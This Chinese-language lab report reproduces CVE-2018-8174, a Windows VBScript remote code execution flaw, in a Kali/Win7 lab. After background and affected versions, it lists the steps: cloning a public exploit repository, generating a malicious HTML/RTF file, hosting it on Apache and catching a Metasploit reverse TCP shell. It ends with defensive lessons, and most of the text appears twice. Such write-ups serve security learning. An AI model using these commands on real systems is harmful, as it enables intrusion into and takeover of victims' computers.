一、该漏洞的相关背景CVE-2018-8174是 Windows VBScript Engine 代码执行漏洞。由于VBScript脚本执行引擎存在代码执行漏洞攻击者可以将恶意的VBScript嵌入到Office文件或者网站中一旦用户不小心点击远程攻击者可以获取当前用户权限执行脚本中的恶意代码该漏洞影响最新版本的IE浏览器及使用了IE内核的应用程序。用户在浏览网页或打开Office文档时都可能中招最终被黑客植入后门木马完全控制电脑。在基于Web的攻击情形中攻击者能通过Internet Explorer利用此漏洞的特定网站然后诱使用户查看该网站。攻击者还可以在承载IE呈现引擎的应用程序或Microsoft Office文档中嵌入标记为“安全初始化”的ActiveX控件。攻击者还可以利用受到破坏的网站和接受或托管用户提供的内容或广告的网站。这些网站可能包含可能利用此漏洞的特制内容。二、漏洞触发的核心背景原因在当时的Win生态中VBScript被广泛应用于网页脚本解析与部分企业环境中而当时IE浏览器作为系统默认组件其所带脚本引擎具有较高权限一旦被利用攻击者可在当前用户权限下执行任意代码。三、漏洞影响的范围CVE-2018-8174影响范围较广主要存在于以下系统版本1.Windows7 / 8.1 10以及Windows Server系列2.使用IE内核应用程序在未打补丁的系统中用户仅仅访问恶意页面即可触发漏洞并无需额外交互。四、实验过程建议提前关闭靶机的防火墙利用CVE-2018-8174漏洞获取靶机权限准备kali攻击机、win7靶机实验开始前确保双机可以ping通1.获取攻击所用的EXP方法一直接进行gitgit clone https://github.com/iBearcat/CVE-2018-8174_EXP.git方法二下载到本地进行解压再复制到kali适用于kali无法进行git的情况cd CVE-2018-8174_EXP-mastercd /home/kali/Desktop/CVE-2018-8174_EXP-master/2.生成恶意html与rtf文件这里需要注意该漏洞利用工具明确要求Python 2.x环境运行使用Python 3.x会触发语法错误”这是一个关键点明确利用工具的运行环境。否则会报错如下正确的运行语句python2 CVE-2018-8174.py -u http://192.168.142.133/exploit.html -o exploit.rtf -i 192.168.142.133 -p 4444(IP地址为自己kali攻击机的地址3.将恶意html文件移动到网站根目录并启动apach2服务cp exploit.html /var/www/htmlservice apache2 start新打开一个终端生成MSF监听msfconsole -x use exploit/multi/handler;set PAYLOAD Windows/shell/reverse_tcp;set LHOST 192.168.142.133; set lport 4444;run在靶机win7上打开恶意链接http://192.168.142.133/exploit.html此时在kali接收到shell可在meterpreter中管理shell但非管理员权限4.至此结束初级权限渗透后续进一步权限提升可结合其他手段五、总结通过本次实验提升了我对漏洞利用流程信息收集、利用构造、权限获取的整体理解也加深了对安全防护重要性的认识例如及时更新补丁、禁用不必要组件如VBScript以及提高用户安全意识等。整体而言本实验有效增强了我的实践能力和对Web与系统安全的综合理解也让我认识到真实攻击往往是“漏洞链”而非单一漏洞。
CVE-2018-8174漏洞复现实验报告
一、该漏洞的相关背景CVE-2018-8174是 Windows VBScript Engine 代码执行漏洞。由于VBScript脚本执行引擎存在代码执行漏洞攻击者可以将恶意的VBScript嵌入到Office文件或者网站中一旦用户不小心点击远程攻击者可以获取当前用户权限执行脚本中的恶意代码该漏洞影响最新版本的IE浏览器及使用了IE内核的应用程序。用户在浏览网页或打开Office文档时都可能中招最终被黑客植入后门木马完全控制电脑。在基于Web的攻击情形中攻击者能通过Internet Explorer利用此漏洞的特定网站然后诱使用户查看该网站。攻击者还可以在承载IE呈现引擎的应用程序或Microsoft Office文档中嵌入标记为“安全初始化”的ActiveX控件。攻击者还可以利用受到破坏的网站和接受或托管用户提供的内容或广告的网站。这些网站可能包含可能利用此漏洞的特制内容。二、漏洞触发的核心背景原因在当时的Win生态中VBScript被广泛应用于网页脚本解析与部分企业环境中而当时IE浏览器作为系统默认组件其所带脚本引擎具有较高权限一旦被利用攻击者可在当前用户权限下执行任意代码。三、漏洞影响的范围CVE-2018-8174影响范围较广主要存在于以下系统版本1.Windows7 / 8.1 10以及Windows Server系列2.使用IE内核应用程序在未打补丁的系统中用户仅仅访问恶意页面即可触发漏洞并无需额外交互。四、实验过程建议提前关闭靶机的防火墙利用CVE-2018-8174漏洞获取靶机权限准备kali攻击机、win7靶机实验开始前确保双机可以ping通1.获取攻击所用的EXP方法一直接进行gitgit clone https://github.com/iBearcat/CVE-2018-8174_EXP.git方法二下载到本地进行解压再复制到kali适用于kali无法进行git的情况cd CVE-2018-8174_EXP-mastercd /home/kali/Desktop/CVE-2018-8174_EXP-master/2.生成恶意html与rtf文件这里需要注意该漏洞利用工具明确要求Python 2.x环境运行使用Python 3.x会触发语法错误”这是一个关键点明确利用工具的运行环境。否则会报错如下正确的运行语句python2 CVE-2018-8174.py -u http://192.168.142.133/exploit.html -o exploit.rtf -i 192.168.142.133 -p 4444(IP地址为自己kali攻击机的地址3.将恶意html文件移动到网站根目录并启动apach2服务cp exploit.html /var/www/htmlservice apache2 start新打开一个终端生成MSF监听msfconsole -x use exploit/multi/handler;set PAYLOAD Windows/shell/reverse_tcp;set LHOST 192.168.142.133; set lport 4444;run在靶机win7上打开恶意链接http://192.168.142.133/exploit.html此时在kali接收到shell可在meterpreter中管理shell但非管理员权限4.至此结束初级权限渗透后续进一步权限提升可结合其他手段五、总结通过本次实验提升了我对漏洞利用流程信息收集、利用构造、权限获取的整体理解也加深了对安全防护重要性的认识例如及时更新补丁、禁用不必要组件如VBScript以及提高用户安全意识等。整体而言本实验有效增强了我的实践能力和对Web与系统安全的综合理解也让我认识到真实攻击往往是“漏洞链”而非单一漏洞。
